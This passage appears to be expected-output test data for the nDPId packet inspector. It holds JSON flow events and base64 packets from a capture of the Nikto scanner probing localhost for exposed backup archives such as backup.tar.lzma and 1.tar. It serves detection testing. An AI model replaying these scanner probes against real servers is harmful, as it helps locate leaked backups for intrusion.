{"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1576420277145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277145,"pkt":"AAAAAAAAAAAAAAAACABFAADD1QZAAEAGZyx\/AAABfwAAAcPaH5AWHu2DG+Oig4AYAED+twAAAQEICp1m\/MGdZvzBR0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1576420277148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277148,"pkt":"AAAAAAAAAAAAAAAACABFAADDYFdAAEAG29t\/AAABfwAAAcPcH5BE+VjTl6\/NvYAYAED+twAAAQEICp1m\/MSdZvzER0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1576420277153,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277153,"pkt":"AAAAAAAAAAAAAAAACABFAADCOn5AAEAGAbZ\/AAABfwAAAcPeH5C7hwL1asNzroAYAED+tgAAAQEICp1m\/MmdZvzJR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1576420277155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277155,"pkt":"AAAAAAAAAAAAAAAACABFAADCDytAAEAGLQl\/AAABfwAAAcPgH5C7IzeiGEGCK4AYAED+tgAAAQEICp1m\/MudZvzLR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1576420277157,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277157,"pkt":"AAAAAAAAAAAAAAAACABFAADJ8y5AAEAGSP5\/AAABfwAAAcPiH5D9g8umqBgGFIAYAED+vQAAAQEICp1m\/M2dZvzNR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1576420277159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277159,"pkt":"AAAAAAAAAAAAAAAACABFAADJ4mhAAEAGWcR\/AAABfwAAAcPkH5ACw9rweorXCIAYAED+vQAAAQEICp1m\/M+dZvzPR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1576420277160,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277160,"pkt":"AAAAAAAAAAAAAAAACABFAAC9m2BAAEAGoNh\/AAABfwAAAcPmH5DB5aPVANERlIAYAED+sQAAAQEICp1m\/NCdZvzQR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1576420277162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277162,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DilAAEAGLhB\/AAABfwAAAcPoH5AB6DautSQRQ4AYAED+sQAAAQEICp1m\/NKdZvzRR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1576420277164,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277164,"pkt":"AAAAAAAAAAAAAAAACABFAADFIABAAEAGHDF\/AAABfwAAAcPqH5Cuoid2XcqpP4AYAED+uQAAAQEICp1m\/NSdZvzTR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1576420277165,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277165,"pkt":"AAAAAAAAAAAAAAAACABFAADFxNJAAEAGd15\/AAABfwAAAcPsH5ANevxccArVDoAYAED+uQAAAQEICp1m\/NWdZvzVR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1576420277166,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277166,"pkt":"AAAAAAAAAAAAAAAACABFAADFbqBAAEAGzZB\/AAABfwAAAcPuH5Bs\/lYWJw4fzoAYAED+uQAAAQEICp1m\/NadZvzWR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
